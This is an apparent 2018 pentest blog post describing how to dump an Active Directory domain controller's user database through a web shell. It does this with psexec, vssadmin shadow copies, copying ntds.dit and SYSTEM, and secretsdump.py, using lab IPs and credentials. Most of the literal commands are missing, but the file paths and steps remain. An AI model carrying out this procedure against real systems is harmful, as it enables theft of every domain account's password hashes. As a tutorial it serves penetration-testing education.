2018-12-06

Remotely dump "Active Directory Domain Controller" machine user database using web shell

Hello All,

This time i want to share something related to "Windows Active Directory(AD)" environment related.
I am gonna demonstrate "How to dump Windows Active directory user database" just using web shell.
There may be the case, during a Pentest, Pentester got the "Domain Admin" user credentials and web shell access on one of the machine connected to Windows Active Directory forest. Pentester trying to get Reverse shell and due to some reasons not getting it (Let's say Network Firewall is not allowing) but Pentest goal is to dump AD user database i.e users and NTLM password hashes of the AD environment.
I also faced same issue during pentest (was not having server with public IP :P). After playing around this issue a little-bit, i got a way which is helpful to achieve above mentioned goal just using web shell if we have "AD Domain Admin" user credentials.
Here, assumption is below mentioned:

1. AD Domain Controller machine (queen.DC1.indishell.lab - 192.168.56.200)
2. Compromised windows machine - connected to AD (LABONE - 192.168.56.101)
3. Managed to get Windows AD Domain Admin user (using any exploit, like in my case i got Domain Admin user password using legendry "MS14-025" exploit)

Now, I have web shell access on Windows machine which is connected to domain i.e "LABONE" and its IP is "192.168.56.101". I got Domain Admin having user name "user1" and it's password is "ica_1046".

In this case, I will be using 2 binaries:
1. psexec.exe <- Windows internal tool
2. vssadmin <- command to create/delete volume shadow copy of a Windows drive.

Anyhow if we manage to run "vssadmin" command on Windows AD Domain Controller machine, "vssadmin" command will generate volume shadow copy of "C" drive and from that shadow copy we can copy "ntds.dit" and "SYSTEM" files of AD Domain controller machine.
To achieve the above mentioned task, we will be using "psexec.exe" which is capable of executing commands on remote Windows machines if we specify the target machine IP, domain admin username and its password with "elevated" option (by specifying -h).
We need to upload psexec.exe on Windows machine "LABONE" using web shell. From web shell, we will specify the AD Domain Controller machine IP, Domain admin user username and its password along with "vssadmin" command.
psexec binary will execute vssadmin command on Windows AD Domain Controller machine remotely. After creating "C" drive shadow copy, we need to copy the "ntds.dit" and "SYSTEM" file from that shadow copy to the machine where we have web shell access i.e to Windows domain machine "LABONE". This task can be done using "psexec" binary, we just need to specify the target AD Domain Controller machine IP, Domain Admin username and it's password along the "copy" command in which we specify "copy command, please copy the ndts.dit and SYSTEM file from shadow copy to LABONE machine using SMB". I will be copying the files in same directory where i have dumped psexec binary file on "LABONE" machine.

General command for using "psexec" binary to execute command on remote host

in my case, information was given below:
remote_IP  192.168.56.200 (queen.DC1.indishell.lab)
user_name  user1
password_of_the_user  ica_1046

I have web shell on windows domain machine "LABONE" and uploaded psexec binary on the server.


First, I am checking whether is there any shadow copy of "C" rive is available or not. To list the available volume shadow copies, command is:

Here, web shell is not capable of showing all the output of command executed by psexec binary on remote host, so i am just redirecting the output of the command the machine "LABONE" (where i have web shell access). I will be directing output of the command in directory "C:\xampp\htdocs\box\ps\"
And command to perform this task is:
 
 
Web shell is showing that psexec is executing command on remote Windows AD Domain Controller machine. If everything goes fine, we will get file with name "out.txt" in directory "C:\xampp\htdocs\box\ps" and it will contain the output of "vssadmin list shadows" command which was executed on AD Domain controller machine (192.168.56.200).


Yes, we have file in the directory. Let's check the content of the file "out.txt".


"out.txt" file content is showing that target Domain controller machine does not has any volume shadow copy till now.

Let's create one shadow copy of "C" drive so that we can steal "ntds.dit" and "SYSTEM" file from it.
Command to create volume shadow copy of c drive is


one important thing which we need to keep in mind is, we need to have the name of newly created volume shadow copy of "C" drive and it will be in the output of the command, so we will be redirecting the output of the above command to the machine on which we have web shell access.
To copy the "ntds.dit" and "SYSTEM" file from target machine, we need to have the name of shaodw copy.
Final command will be:


In above mentioned command, psexec binary is executing command on Windows AD Domain Controller machine (192.168.56.200) to create shadow copy of "C" drive and then redirect the output of that command to machine "LABONE" in file "C:\xmpp\htdocs\box\ps\out.txt"


  Content of the "out.txt" file will tell us the location of the shadow copy.


In above screenshot, we can see that shadow copy volume name is "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\".

location of "ntds.dit" and "SYSTEM" file will be following:

"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"

 "shadow_copy_volume_name\Windows\System32\config\SYSTEM"

In my case it will be:

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"

 "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"

 Let's copy the "ntds.dit" file from the target Windows AD Domain Controller machine by using below mentioned command:


This command will copy the "ntds.dit" file from remote machine having IP "192.168.56.200" to the machine "LABONE" having IP "192.168.56.101" in directory "C:\xampp\htdocs\box\ps\"


And yes, web shell is showing that 1 file has been copied from target DC machine to my machine. Let's confirm and check whether directory "C:\xampp\htdocs\box\ps" is having "ntds.dit" file or not.


Yes, it has been copied to "LABONE" machine on which i am having web shell access.

And, finally copy "SYSTEM" file as well using below mentioned command:



Command executed successfully and web shell showing "1 file copied" message. let's check for "SYSTEM" file as well.


And that's all. we finally got both the files on "LABONE" machine, from where we can download these files using web shell.

Now, we can extract Domain, udi, rid LM and NT hashes from "ntds.dit" and "SYSTEM"  files using secretsdump.py python script

command to dump user id, LM and NT hashes is:



Result will be something like this


Thanks for reading.

Special thanks to Sean Metcalf, OJ, Vincent Yiu, Andrew Robbins, will, Benjamin Delpy, Marcello, Andrew van der Stock, g0tmi1k, Alvaro Muñoz, b33f, pancake, m3g9tr0nAnurag Srivastava, vivek chauhan, Spirited wolf


--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)



Share this post

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top